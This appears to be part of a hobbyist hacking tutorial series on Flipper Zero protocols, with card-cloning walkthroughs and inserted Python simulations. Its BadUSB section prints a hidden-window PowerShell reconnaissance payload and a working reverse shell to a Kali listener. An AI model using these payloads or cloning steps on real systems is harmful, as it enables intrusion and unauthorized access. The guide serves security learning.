The Hacker's Path: A 5-Part Series
Part 1: Introduction → Part 2: Flipper Mastery → Part 3: Kali Fundamentals → Part 4: Exploitation → Part 5: The Full Audit
In Part 1, you got your feet wet. You cloned some IR remotes, scanned some NFC cards, watched the sub-GHz spectrum light up, and typed "Hello World" with BadUSB. You saw that security is often an illusion.
Now we go deep. By the end of this article, you'll understand every major protocol your Flipper Zero can interact with—not just how to use them, but why they work the way they do and what that means for security.
Fair warning: You're going to discover that several things you assumed were secure... aren't.
The Flipper Philosophy
Before we dive into protocols, let's establish the right mindset. The Flipper Zero is not a "hacking device" in the Hollywood sense. It's a learning tool that lets you interact with radio frequencies and hardware protocols that are normally invisible.
Think of it like a magnifying glass for wireless signals. The signals were always there. You just couldn't see them. Now you can.
This distinction matters because it changes how you approach security. Most "security" relies on obscurity—the assumption that attackers won't know how to interact with a system. Your Flipper removes that obscurity. It shows you exactly what's being transmitted and received. And once you can see it, you can evaluate whether actual security exists.
Spoiler: Often, it doesn't.
⚠️ Reminder: Your Stuff Only
Everything in this article is for testing YOUR OWN devices, cards, and systems. The techniques work on anyone's stuff—that's the point. But using them on systems you don't own is illegal. Test your own security. Discover your own vulnerabilities. That's the path.
Sub-GHz: The Invisible Spectrum
Sub-gigahertz radio frequencies are everywhere. Your garage door, car key fob, weather station, wireless doorbell, tire pressure sensors, smart home devices—they're all constantly transmitting in frequency bands below 1 GHz.
Why sub-GHz? Lower frequencies travel farther and penetrate walls better than higher frequencies like WiFi (2.4/5 GHz). That makes them perfect for devices that need reliable communication over distance without line-of-sight requirements.
The Frequency Landscape
Different regions use different frequencies due to regulations:
- 315 MHz: North America—older garage doors, car fobs
- 390 MHz: North America—garage doors, some automotive
- 433.92 MHz: Worldwide—weather stations, sensors, European devices, many IoT products
- 868 MHz: Europe—smart home, LoRa, utility meters
- 915 MHz: Americas—LoRa, smart home, industrial
With Momentum firmware, your Flipper can transmit and receive across all these bands regardless of your physical location. Stock firmware restricts you to your region's legal frequencies. This matters for learning—you might have devices operating on "foreign" frequencies.
Project: Analyze Your Garage Door
Time: 15 minutes
What you'll learn: The difference between static codes and rolling codes—and why it matters
Steps:
- Navigate to Sub-GHz → Read
- Stand near your garage (not so close that the door opens)
- Press your garage door remote button
- Watch the Flipper capture the signal
- Examine what was captured—look at the protocol identified
What you might see:
- Princeton, Linear, Chamberlain (old): Static codes. The same code transmits every time. Vulnerable to replay attacks.
- KeeLoq, Security+ 2.0, Rolling Code: Rolling codes. Each transmission uses a different code from a synchronized sequence. Cannot be simply replayed.
The reality: If your garage door uses a static code (many installed before ~2015 do), anyone who captures that signal once can replay it forever. Your garage is secured by the assumption that no one is listening. That assumption just broke.
Rolling Codes Explained
Modern garage doors and car key fobs use rolling codes (also called hopping codes). Here's how they work:
- Both the transmitter (your remote) and receiver (your garage) share a secret seed and algorithm
- Each button press generates the next code in a synchronized sequence
- The receiver accepts the current code OR any of the next ~256 codes (to handle button presses out of range)
- Once a code is used, it's invalidated forever
This means capturing and replaying a rolling code signal doesn't work—by the time you replay it, the code is already invalidated.
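To make the four bullets above concrete, here is a small simulation added for this article (it is not Flipper or Momentum code and models no particular product). It assumes HMAC-SHA256 truncated to 32 bits as a stand-in for the proprietary cipher that KeeLoq-style remotes use, and the receiver window of 256 codes stated above. A static-code receiver is included for contrast, and the last step shows the edge case the window exists for: a remote pressed far beyond the window falls out of sync and is rejected until it is re-paired.

```python
import hashlib
import hmac

WINDOW = 256  # the page's figure: receiver accepts the current code or any of the next ~256


def derive_code(seed: bytes, counter: int) -> bytes:
    """Hopping code for one counter value.

    Assumption: HMAC-SHA256 truncated to 32 bits stands in for the proprietary
    block cipher real products use. The logic is the same: without the seed,
    nobody can compute the next valid code.
    """
    return hmac.new(seed, counter.to_bytes(4, "big"), hashlib.sha256).digest()[:4]


class RollingRemote:
    def __init__(self, seed: bytes):
        self.seed, self.counter = seed, 0

    def press(self) -> bytes:
        code = derive_code(self.seed, self.counter)
        self.counter += 1  # every press moves forward, whether or not the door heard it
        return code


class RollingReceiver:
    def __init__(self, seed: bytes):
        self.seed, self.expected = seed, 0

    def accept(self, code: bytes) -> bool:
        # Look ahead WINDOW counters so presses made out of range do not desync the pair.
        for offset in range(WINDOW):
            if hmac.compare_digest(derive_code(self.seed, self.expected + offset), code):
                self.expected += offset + 1  # this code and everything before it is now dead
                return True
        return False


def static_accept(stored_code: bytes, received: bytes) -> bool:
    """What a static-code receiver (Princeton, Linear, ...) does: plain equality."""
    return hmac.compare_digest(stored_code, received)


def demo() -> dict:
    seed = b"constructed-shared-seed"  # constructed; a real seed is burned in at manufacture

    # Static code: the captured signal *is* the credential, so a replay works forever.
    static_code = b"\x12\x34\x56\x78"  # constructed
    static_replay = static_accept(static_code, static_code)

    remote, door = RollingRemote(seed), RollingReceiver(seed)
    captured = remote.press()                # a legitimate press, recorded over the air
    first_use = door.accept(captured)        # door opens
    rolling_replay = door.accept(captured)   # same bytes again: rejected, counter moved on

    for _ in range(10):                      # presses made out of range of the door
        remote.press()
    resync = door.accept(remote.press())     # still inside the window: accepted

    for _ in range(WINDOW + 50):             # far too many unheard presses
        remote.press()
    beyond_window = door.accept(remote.press())  # outside the window: rejected (desync)

    return {
        "static_replay_accepted": static_replay,
        "rolling_first_use_accepted": first_use,
        "rolling_replay_accepted": rolling_replay,
        "resync_within_window": resync,
        "beyond_window_accepted": beyond_window,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The `accept` loop is the whole security argument in one place: the receiver never compares against a stored code, it recomputes candidates from the shared seed, and a match moves the pointer forward so the matched code can never be accepted again.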
Why This Matters
Rolling codes were invented because the sub-GHz world discovered that security through obscurity fails. Someone figured out how to capture and replay signals, so the industry had to implement actual cryptographic security. This pattern repeats across every protocol we'll discuss: security only gets added after someone demonstrates the vulnerability.
Project: Capture Weather Station Data
Time: 10 minutes
What you'll learn: How much data broadcasts without any protection
Steps:
- Navigate to Sub-GHz → Read
- Wait near any wireless weather sensor (outdoor thermometer, rain gauge, etc.)
- Most transmit every 30-60 seconds
- Capture the transmission
- Note the protocol and any decoded data
What you'll find: Temperature, humidity, battery status, sensor ID—all transmitted in plaintext. No encryption, no authentication. Any receiver tuned to that frequency gets all the data. Now think about what else in your neighborhood is broadcasting...
RFID: The 125kHz World
Low-frequency RFID (125kHz) is the older, simpler proximity card technology. You'll find it in gym membership cards, older office building access cards, parking garages, and apartment building entry systems.
And it's almost universally terrible for security.
How 125kHz RFID Works
These cards are passive—they have no battery. When you hold one near a reader, the reader's electromagnetic field powers the card, and the card transmits its ID number. That's it. No challenge-response. No encryption. Just: "I am card number 12345."
The reader says "okay" and grants access based solely on knowing that ID number.
You see the problem.
Common 125kHz Card Types
- EM4100: Extremely common. Just broadcasts a 40-bit ID. Zero security.
- HID Prox: The most common corporate access card. Broadcasts facility code + card number. Zero security.
- Indala: Less common. Different encoding but same problem—no security.
- AWID: Another variant. Same fundamental weakness.
Notice the pattern? All of these cards simply broadcast an ID. The "security" is that someone would need specialized equipment to read that ID. Your Flipper is that equipment.
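Added example, not from the page's author or from any Flipper library: encoders and the reader-side checks for two of the formats named above, EM4100 (a 64-bit frame built around a 40-bit ID) and HID's 26-bit H10301 layout (8-bit facility code, 16-bit card number). The field layouts are the published ones; the sample IDs are constructed. The thing to notice is that no key or secret appears anywhere in either function: a reader can verify only framing and parity, so the ID on the card is the entire credential.

```python
def em4100_encode(card_id: int) -> list[int]:
    """Build the 64-bit EM4100 frame for a 40-bit ID.

    Layout: 9 header ones, 10 rows of (4 data bits + even row parity),
    4 even column parity bits, 1 stop bit (0). Every bit is a function of
    the ID alone; there is no key anywhere in this computation.
    """
    if not 0 <= card_id < (1 << 40):
        raise ValueError("EM4100 IDs are 40 bits")
    bits = [1] * 9
    columns = [0, 0, 0, 0]
    for i in range(10):
        nibble = (card_id >> (4 * (9 - i))) & 0xF
        row = [(nibble >> 3) & 1, (nibble >> 2) & 1, (nibble >> 1) & 1, nibble & 1]
        bits += row + [sum(row) % 2]
        columns = [c ^ b for c, b in zip(columns, row)]
    return bits + columns + [0]


def em4100_decode(bits: list[int]):
    """Return the 40-bit ID if the frame is well-formed, else None.

    This is everything a reader checks: header, row parity, column parity, stop bit.
    """
    if len(bits) != 64 or bits[:9] != [1] * 9 or bits[63] != 0:
        return None
    card_id, columns = 0, [0, 0, 0, 0]
    for i in range(10):
        row = bits[9 + 5 * i : 9 + 5 * i + 4]
        if sum(row) % 2 != bits[9 + 5 * i + 4]:
            return None
        columns = [c ^ b for c, b in zip(columns, row)]
        card_id = (card_id << 4) | (row[0] << 3 | row[1] << 2 | row[2] << 1 | row[3])
    if columns != bits[59:63]:
        return None
    return card_id


def hid_h10301_encode(facility_code: int, card_number: int) -> int:
    """26-bit HID H10301 frame (bit 0 is the first bit sent).

    Bit 0: even parity over bits 1-12; bits 1-8: facility code;
    bits 9-24: card number; bit 25: odd parity over bits 13-24.
    """
    if not (0 <= facility_code < 256 and 0 <= card_number < 65536):
        raise ValueError("facility code is 8 bits, card number 16 bits")
    body = (facility_code << 16) | card_number            # 24 payload bits
    even = bin(body >> 12).count("1") % 2                   # parity over first 12 payload bits
    odd = 1 - bin(body & 0xFFF).count("1") % 2              # parity over last 12 payload bits
    return (even << 25) | (body << 1) | odd


def hid_h10301_decode(frame: int):
    """Return (facility_code, card_number) if both parity bits check, else None."""
    body = (frame >> 1) & 0xFFFFFF
    even, odd = frame >> 25, frame & 1
    if even != bin(body >> 12).count("1") % 2 or odd != 1 - bin(body & 0xFFF).count("1") % 2:
        return None
    return body >> 16, body & 0xFFFF


if __name__ == "__main__":
    frame = em4100_encode(0x1234567890)  # constructed sample ID
    print("".join(map(str, frame)), hex(em4100_decode(frame)))
    print(hex(hid_h10301_encode(1, 2)), hid_h10301_decode(hid_h10301_encode(1, 2)))
```

Because the decoders check parity and nothing else, the only defence a site has is to stop the ID from being read or guessed, which is exactly the assumption the page says breaks. Rotating IDs does not help; a technology with a challenge-response step does.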
Project: Clone Your Gym Card
Time: 5 minutes
What you need: Your gym/pool/apartment 125kHz card, a T5577 blank card ($1-2 each)
Steps:
- Navigate to 125 kHz RFID → Read
- Hold your card against the Flipper's back (where the RFID antenna is)
- Wait for successful read—note the card type and ID
- Save the card with a recognizable name
- To test emulation: Saved → Select Card → Emulate
- Hold Flipper to your gym's reader—it should work identically to your card
To write to a blank T5577:
- Go to your saved card
- Select Write
- Hold a T5577 blank card to the Flipper
- Wait for write confirmation
- You now have a physical clone
Why this matters: The entire security model of that access control system just collapsed. Anyone who can get close to your card for two seconds can clone it. Think about that the next time you leave your gym bag unattended in the locker room.
The T5577: Your Magic Card
The T5577 is a rewritable RFID card that can emulate most 125kHz card types. It's like a blank CD-R for access cards. You can write any card data to it, and it becomes that card.
Buy a pack of 10 for testing. They're cheap and incredibly useful for understanding how weak this entire technology is. You can write one card's data, test it, then write a different card's data, all on the same physical card.
What This Reveals
125kHz RFID "security" is pure theater. These systems assume you can't read the card, can't copy the data, and can't write it to another card. All three assumptions are false with consumer equipment. If your workplace uses HID Prox cards (the most common corporate access card), any employee with a Flipper can clone any other employee's access. Let that sink in.
Key Takeaway
125kHz RFID security is pure theater. These systems assume you cannot read, copy, or rewrite card data. All three assumptions are false with consumer equipment costing under $200.
NFC: The 13.56MHz World
High-frequency NFC (13.56 MHz) is the newer generation. It powers contactless payment, modern access cards, transit systems, hotel keys, and your phone's tap-to-pay.
The good news: Some NFC cards actually have real security.
The bad news: Many don't.
NFC Card Types
- MIFARE Classic: Extremely common in access cards, transit, hotels. Uses proprietary encryption that was cracked years ago. Vulnerable.
- MIFARE Ultralight: Simple cards with minimal security. Often used for disposable transit tickets.
- NTAG: Common in NFC tags for automation. Usually minimal security.
- MIFARE DESFire: Actually secure. Uses AES encryption. Used in newer high-security deployments.
- EMV (Payment Cards): Your credit card. Has strong encryption, transaction limits, and fraud detection.
Project: Analyze Your Work Badge
Time: 10 minutes
What you'll learn: Whether your workplace has real security or security theater
Steps:
- Navigate to NFC → Read
- Hold your work badge against the Flipper's back
- Wait for the read to complete
- Examine what the Flipper tells you
Interpreting results:
- MIFARE Classic 1K/4K: Your badge uses cracked encryption. With time and the right tools, it can be cloned.
- MIFARE Ultralight: Minimal security. Often clonable.
- MIFARE DESFire: Actually secure. You'll see limited data.
- Unknown/Locked: Could be proprietary or could be DESFire. More investigation needed.
Reality check: Most corporate badges are still MIFARE Classic. The encryption was broken publicly in 2008. Eighteen years ago. If your badge says MIFARE Classic, your employer is running a security system that cryptographers consider laughably broken.
UID Cloning vs Full Cloning
Important distinction: The Flipper can always read and emulate a card's UID (Unique Identifier)—the serial number. Some access systems only check the UID. For these systems, simple emulation works.
Better systems check both the UID AND encrypted data stored on the card. For these, you'd need to also clone the encrypted sectors—possible for MIFARE Classic (the encryption is broken) but not for DESFire.
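Added example (not Flipper, MIFARE, or DESFire code): a UID-only reader beside a challenge-response reader, each presented with a genuine card, a UID-only emulation, and an emulation that replays a response recorded from an earlier exchange. It assumes HMAC-SHA256 as a stand-in for DESFire's AES-based authentication and shows only the card proving itself to the reader; real DESFire authentication is mutual. The UID and key are constructed placeholders.

```python
import hashlib
import hmac
import os


class GenuineCard:
    """Card holding the per-card secret key (what DESFire keeps inside its chip)."""

    def __init__(self, uid: bytes, key: bytes):
        self.uid, self._key = uid, key

    def respond(self, challenge: bytes) -> bytes:
        # Assumption: HMAC-SHA256 stands in for DESFire's AES authentication.
        return hmac.new(self._key, self.uid + challenge, hashlib.sha256).digest()


class UidCloneCard:
    """UID-only emulation: knows the serial number and nothing else."""

    def __init__(self, uid: bytes):
        self.uid = uid

    def respond(self, challenge: bytes) -> bytes:
        return bytes(32)  # no key, so it can only guess


class ReplayCard:
    """Emulation that replays one card response it recorded earlier."""

    def __init__(self, uid: bytes, recorded_response: bytes):
        self.uid, self._recorded = uid, recorded_response

    def respond(self, challenge: bytes) -> bytes:
        return self._recorded


def uid_only_reader(card, allowed_uids: set) -> bool:
    """Weak reader: trusts the serial number alone."""
    return card.uid in allowed_uids


def challenge_response_reader(card, keys_by_uid: dict) -> bool:
    """Reader that makes the card prove key possession against a fresh random challenge."""
    key = keys_by_uid.get(card.uid)
    if key is None:
        return False
    challenge = os.urandom(16)  # fresh every attempt, so a recorded response is useless
    expected = hmac.new(key, card.uid + challenge, hashlib.sha256).digest()
    return hmac.compare_digest(expected, card.respond(challenge))


def demo() -> dict:
    uid = bytes.fromhex("04a1b2c3d4e5f6")     # constructed 7-byte UID
    key = b"constructed-per-card-secret-key"  # constructed
    genuine, clone = GenuineCard(uid, key), UidCloneCard(uid)
    allowed, keys = {uid}, {uid: key}

    # One genuine exchange, captured as an eavesdropper next to the reader would.
    recorded = genuine.respond(os.urandom(16))
    replayer = ReplayCard(uid, recorded)

    return {
        "uid_only_accepts_genuine": uid_only_reader(genuine, allowed),
        "uid_only_accepts_clone": uid_only_reader(clone, allowed),
        "cr_accepts_genuine": challenge_response_reader(genuine, keys),
        "cr_accepts_clone": challenge_response_reader(clone, keys),
        "cr_accepts_replay": challenge_response_reader(replayer, keys),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Two things follow from the simulation. A DESFire card behind a reader that is configured to check only the UID gives you the weak row of the table, not the strong one, so the reader configuration matters as much as the card. And MIFARE Classic does perform a challenge-response of this shape; the reason the page files it under "broken" is that its Crypto-1 cipher lets the key be recovered from captured exchanges, so the key-possession proof no longer proves anything.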
Project: Hotel Key Card Analysis
Time: 5 minutes (next time you're at a hotel)
What you'll learn: How hotel security actually works
Steps:
- Read your hotel key card with NFC → Read
- Note the card type
- Look at what data is readable
What you'll typically find: Most hotel keys are MIFARE Ultralight or Classic. Some show room number, check-out date, or other metadata in readable sectors. The "security" is that guests don't usually have NFC readers. You do now.
Magic Cards for NFC
Like the T5577 for 125kHz, there are "magic" NFC cards for 13.56MHz:
- Gen1 (UID Changeable): Can write custom UID. Detected by some readers as "magic."
- Gen2 (CUID): Better compatibility. UID changes stick through power cycles.
- Gen3 (UFUID): Can lock UID after writing—appears as normal card.
- Gen4 (Ultimate Magic): Most flexible. Can emulate multiple card types.
For learning, Gen2 cards are the sweet spot—cheap, widely compatible, and good enough for most testing.
Infrared: Complete Control
You already created IR remotes in Part 1. Let's go deeper.
Building the Ultimate Remote Library
The Flipper can store unlimited IR remotes. But learning each button individually is tedious. Better approach: use the community databases.
Momentum firmware includes IRDB—a massive database of pre-captured remotes. You can also download remotes from GitHub repositories and add them to your Flipper's SD card.
Project: Build Your IR Arsenal
Time: 20 minutes
Steps:
- On your Flipper: Infrared → Universal Remotes
- You'll find pre-built universal remotes for TVs, ACs, projectors, etc.
- Test these against your devices
- For devices not covered, use Learn New Remote
- Organize saved remotes by room or device type
Power move: Create "room remotes" that combine all IR devices in a single space. One file controls TV, soundbar, lights, and AC.
What you learn: IR is universal and unprotected. Any device with an IR receiver can be controlled by any device with an IR transmitter. This is intentional—IR was designed for convenience, not security. Your Flipper just makes that convenience universal.
Raw IR Capture
Some devices use non-standard IR protocols. For these, the Flipper can capture the raw signal—the exact timing of on/off pulses—and replay it perfectly.
Navigate to Infrared → Learn New → Raw when standard learning doesn't recognize a signal.
BadUSB: The Rubber Ducky Alternative
In Part 1, you made the Flipper type "Hello World." Now we get serious.
BadUSB (also known as USB Rubber Ducky attacks) exploits a fundamental flaw in how computers handle USB devices: they trust keyboards implicitly. When you plug in a device that claims to be a keyboard, the computer accepts every keystroke without question.
Your Flipper can type approximately 1,000 characters per second. Faster than any human. Fast enough to execute complex attacks before anyone can react.
DuckyScript Fundamentals
BadUSB payloads use DuckyScript, a simple scripting language. Key commands:

REM This is a comment
REM DELAY pauses for the given number of milliseconds
DELAY 1000
REM STRING types the text that follows it
STRING Hello World
REM Named keys press a single key; several names on one line form a chord
ENTER
GUI r
ALT F4
CTRL c
TAB
DOWNARROW
ESCAPE

Project: System Information Grabber
Time: 15 minutes
What it does: Opens PowerShell, gathers system info, saves to a file (on YOUR machine)
REM System Info Grabber - Run on YOUR machine only
DELAY 1000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING $info = @{
ENTER
STRING Hostname = $env:COMPUTERNAME
ENTER
STRING Username = $env:USERNAME
ENTER
STRING Domain = $env:USERDOMAIN
ENTER
STRING IP = (Get-NetIPAddress -AddressFamily IPv4).IPAddress
ENTER
STRING OS = (Get-WmiObject Win32_OperatingSystem).Caption
ENTER
STRING }
ENTER
STRING $info | ConvertTo-Json | Out-File "$env:USERPROFILE\Desktop\sysinfo.json"
ENTER
STRING exit
ENTER

What you learn: In under 3 seconds of physical access, an attacker could gather hostname, username, domain, IP addresses, and OS version. This is reconnaissance. Imagine what else could be typed in those 3 seconds.
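Added example, not part of the page or of the Flipper firmware: a small DuckyScript parser in Python that expands a payload into delays and keystrokes and estimates its run time using the 1,000 characters per second figure given above. It also rejects key names it does not recognise, which is a cheap way to catch a typo before a payload is run on a test machine. The key-name list and the sample script are constructed here, and the estimate ignores USB enumeration time and the target's own latency.

```python
CHARS_PER_SECOND = 1000  # the page's figure for the Flipper's typing speed

# Constructed key-name table covering the commands used in this article.
MODIFIERS = {"GUI", "WINDOWS", "CTRL", "CONTROL", "ALT", "SHIFT"}
NAMED_KEYS = {
    "ENTER", "TAB", "ESCAPE", "ESC", "SPACE", "DELETE", "BACKSPACE",
    "UPARROW", "DOWNARROW", "LEFTARROW", "RIGHTARROW", "HOME", "END",
    "PAGEUP", "PAGEDOWN", "CAPSLOCK", "PRINTSCREEN",
} | {f"F{i}" for i in range(1, 13)}


def parse_duckyscript(script: str) -> list[tuple]:
    """Turn DuckyScript text into ('delay', ms), ('string', text) and ('keys', [...]) actions.

    Raises ValueError on an unknown key name so a typo is caught at review time
    rather than typed into a live machine.
    """
    actions = []
    for lineno, raw in enumerate(script.splitlines(), 1):
        line = raw.lstrip()
        if not line.strip() or line.startswith("REM"):
            continue
        cmd, _, arg = line.partition(" ")  # keep trailing spaces of a STRING argument
        if cmd == "DELAY":
            actions.append(("delay", int(arg)))
        elif cmd == "STRING":
            actions.append(("string", arg))
        else:
            keys = line.split()
            for key in keys:
                if key not in MODIFIERS and key not in NAMED_KEYS and len(key) != 1:
                    raise ValueError(f"line {lineno}: unknown key {key!r}")
            actions.append(("keys", keys))
    return actions


def estimate(script: str, cps: int = CHARS_PER_SECOND) -> dict:
    """Keystroke count and wall-clock estimate: explicit DELAYs plus typing time."""
    delay_ms = keystrokes = 0
    for kind, value in parse_duckyscript(script):
        if kind == "delay":
            delay_ms += value
        elif kind == "string":
            keystrokes += len(value)
        else:
            keystrokes += 1  # a chord such as CTRL ALT DOWNARROW is one keystroke event
    typing_ms = keystrokes * 1000 // cps
    return {"keystrokes": keystrokes, "delay_ms": delay_ms, "total_ms": delay_ms + typing_ms}


# Constructed sample in the shape of the System Info Grabber above, but harmless.
SAMPLE = """\
REM constructed sample: open Notepad via the Run dialog
DELAY 1000
GUI r
DELAY 500
STRING notepad
ENTER
"""

if __name__ == "__main__":
    print(estimate(SAMPLE))
```

Run it over the System Info Grabber and the breakdown makes the "under 3 seconds" claim legible: the three DELAY lines account for 2.5 seconds of the budget, and the roughly 250 typed characters add about a quarter of a second. The delays are there only to let the Run dialog and PowerShell appear, which is why BadUSB defences that slow or block unknown HID devices at enumeration time are effective: the payload has no way to know whether its window is ready.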
Project: Reverse Shell Setup
Time: 30 minutes (including Kali setup)
What it does: Creates a connection back to your Kali machine (prepares for Part 3)
Prerequisites: Kali Linux running (VM is fine), know your Kali IP address
On Kali - Start listener:
nc -lvnp 4444
BadUSB Payload (Windows target):
REM Reverse Shell - Replace KALI_IP with your Kali's IP
DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('KALI_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
ENTER

What happens: The target machine opens a PowerShell connection back to your Kali box. You now have command-line access to that machine. This is the core of how physical access + BadUSB = complete compromise. We'll explore this more in Part 3.
⚠️ These Payloads Are Real
The reverse shell payload above actually works. Use it ONLY on machines you own for testing. Running this on someone else's machine is a federal crime (unauthorized access + installation of backdoor). The point is to understand the threat, not to create one.
Fun Payloads for Demonstrations
For demonstrating BadUSB to others (on their machine with permission), here are some harmless but impressive payloads:
REM Rick Roll - Opens YouTube
DELAY 1000
GUI r
DELAY 500
STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ
ENTER

REM Fake Windows Update - Fullscreen prank page
DELAY 1000
GUI r
DELAY 500
STRING https://fakeupdate.net/win10ue/
ENTER
DELAY 2000
F11

REM Flip Screen Upside Down (Windows)
DELAY 1000
CTRL ALT DOWNARROW

GPIO: Hardware Expansion
The Flipper's GPIO (General Purpose Input/Output) pins let you connect external modules and expand capabilities. This is where the Flipper transforms from a handheld tool to a development platform.
Must-Have Modules
- WiFi Dev Board: Adds WiFi capabilities—packet capture, deauth testing, evil twin attacks. Essential for Part 3 onward.
- CC1101 External Antenna: Dramatically extends Sub-GHz range. The internal antenna works, but external is better for serious work.
- ESP32 Marauder: Turns Flipper into a WiFi/Bluetooth hacking platform. Captures handshakes, runs attacks.
- ProtoBoard: For custom projects and connecting your own hardware.
Project: WiFi Dev Board Setup
Time: 20 minutes
What you need: WiFi Dev Board (official or compatible ESP32)
Steps:
- Flash Marauder firmware to ESP32 (instructions at github.com/justcallmekoko/ESP32Marauder)
- Connect to Flipper's GPIO pins
- Navigate to GPIO → ESP32 → Marauder
- You now have WiFi scanning, deauth, and packet capture
Why this matters: The Flipper alone can't do WiFi—it lacks the right radio hardware. But with the dev board, you can scan networks, capture WPA handshakes, and perform WiFi attacks. We'll use this extensively in Parts 3 and 4.
Advanced Momentum Features
If you're running Momentum firmware (you should be), here are features worth exploring:
- Desktop Animations: Purely cosmetic, but fun. Check out community animation packs.
- Extended Protocols: Momentum adds support for protocols stock firmware doesn't include.
- Application Hub: Additional apps beyond stock—games, tools, specialized utilities.
- Custom Asset Packs: Change the entire look and feel.
The real value is in the unlocked frequencies and extended protocol support. Stock firmware is intentionally limited for legal/regulatory compliance. Momentum assumes you're an adult who understands the rules.
What You've Mastered
You now understand:
- Sub-GHz: How garage doors, car fobs, and sensors communicate—and why rolling codes matter
- 125kHz RFID: Why gym cards and old access badges are trivially clonable
- 13.56MHz NFC: The difference between broken encryption (MIFARE Classic) and real security (DESFire)
- Infrared: How to build a universal remote library and capture raw signals
- BadUSB: Why USB HID trust is a fundamental vulnerability—and how to exploit it
- GPIO: How to expand into WiFi, extended range, and custom hardware
Your Flipper is now a weapon. But it's a screwdriver compared to Kali Linux, which is an entire workshop. Time to boot up the real hacking environment.
Part 2 Checklist
☐ Sub-GHz: Garage door analyzed, rolling vs static codes understood
☐ 125kHz RFID: Cards read, at least one clone tested
☐ NFC: Work badge analyzed, card type identified
☐ Infrared: Complete home remote library built
☐ BadUSB: System info payload tested, reverse shell understood
☐ GPIO: WiFi dev board ready for Part 3
☐ Magic Cards: T5577 and/or NFC magic cards acquired for testing
What's Next
In Part 3, we leave the Flipper's focused capabilities and enter the full penetration testing environment: Kali Linux.
You'll learn:
- Setting up your hacking laboratory (VM installation and configuration)
- Network reconnaissance with nmap—mapping every device on your network
- Wireless reconnaissance—capturing WiFi handshakes with aircrack-ng
- Web reconnaissance—discovering what your router exposes
- Connecting Flipper captures to Kali workflows
The Flipper showed you vulnerabilities exist. Kali helps you understand exactly how deep they go.
See you in Part 3.